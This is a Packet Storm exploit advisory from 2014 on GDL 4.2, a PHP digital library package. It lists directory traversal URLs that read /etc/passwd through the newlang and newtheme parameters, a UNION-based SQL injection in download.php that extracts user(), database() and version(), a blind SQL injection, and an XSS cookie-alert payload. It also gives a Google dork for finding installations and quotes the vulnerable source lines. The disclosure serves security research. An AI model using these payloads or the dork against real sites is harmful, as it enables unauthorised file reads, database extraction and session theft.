what you don't know can hurt you

GDL 4.2 XSS / SQL Injection / Traversal

GDL 4.2 XSS / SQL Injection / Traversal
Posted Feb 28, 2014
Authored by ByEge

GDL version 4.2 suffers from cross site scripting, remote SQL injection, and directory traversal vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, file inclusion
MD5 | c9a5025ecc61c3501600d0920577f7da

GDL 4.2 XSS / SQL Injection / Traversal

Change Mirror Download
-> Title        : GDL 4.2 Multiple Vulnerabilities

-> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip

-> Author : ByEge

-> Home : http://byege.blogspot.com.tr/

-> Tested : Apache/2.2.22 (Win32) PHP/5.4.3

-> Date : 26/02/2014

-> Google Dork : "Powered by GDL 4.2" And "gdl.php?mod=browse"

-> Thanks : F0RTYS3V3N - Cyb3rking - ameN

-> Keyfi : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum boşa geçmiş ömre yaşam denir mi ?

-> Not : Kendini geliştirmek isteyen arkadaşlar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.


###################################
#Directory traversal vulnerability#
###################################
http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 96 - 99 parameter : newlang


// Setting bahasa
$lang = $_COOKIE['gdl_lang'];
$newlang = $_GET['newlang'];

if (isset($newlang)) {
if (file_exists("./lang/$newlang.php")) {
setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$newlang;
} else {
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}

} elseif (isset($lang)) {
$gdl_content->language=$lang;
}else{
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}
}

function set_theme(){
global $gdl_content, $gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 120 - 123 parameter : newtheme

$theme = $_COOKIE['gdl_theme'];
$newtheme = $_GET['newtheme'];

if (isset($newtheme)) {
if (file_exists("./theme/$newtheme/theme.php")) {
setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$newtheme;
} else {
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}

} elseif (isset($theme)) {
$gdl_content->theme=$theme;
}else{
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}

}

function login($userid,$password) {
global $gdl_auth,$gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
#############################
#SQL Injection vulnerability#
#############################
http://localhost/download.php?id=injecthere
Line : gdl42/download.php 18 - 24 parameter : id

$file_id = $_GET['id'];

function download_redirect(){

global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;

$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");
$file_target=@mysql_result($dbres,0,"path");
$file_part=@mysql_result($dbres,0,"part");
$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
###################################
#Blind SQL Injection vulnerability#
###################################
http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere
Line : gdl42/main.php 119 parameter : id
if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
########################################
#Cross site scripting xss vulnerability#
########################################
http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
Line : module/search/function.php 38 parameter : keyword

###############################################################################################################################################################################
###############################################################################################################################################################################

Test Vulnerability :
http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--
http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close